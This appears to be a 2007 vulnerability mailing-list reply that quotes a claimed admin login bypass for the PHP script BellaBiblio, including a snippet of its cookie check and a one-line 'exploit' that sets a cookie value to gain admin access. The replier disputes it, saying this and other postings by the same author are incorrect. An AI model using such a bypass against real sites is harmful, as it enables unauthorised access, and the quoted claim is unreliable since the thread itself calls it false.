Re: BellaBiblio Admin Login Bypass
: BellaBiblio Admin Login Bypass
:
: SCRIPT: BellaBiblio
:
: DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip
:
: AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com>
:
: Bug in;(admin.php)
: if (isset($_COOKIE['bellabiblio'])) {
: if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
: if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = "";
:
: EXPLOIT:
:
: Set your cookie: bellabiblio=administrator http:/site.com/admin.php
: And you have full admin access
As discussed on VIM, this and several of your other postings are all
incorrect or have caveats for them to work.
http://attrition.org/pipermail/vim/2007-July/001733.html
http://attrition.org/pipermail/vim/2007-July/001736.html
http://attrition.org/pipermail/vim/2007-July/001745.html
Regarding your phpWebFileManager posting, also false:
http://attrition.org/pipermail/vim/2007-July/001744.html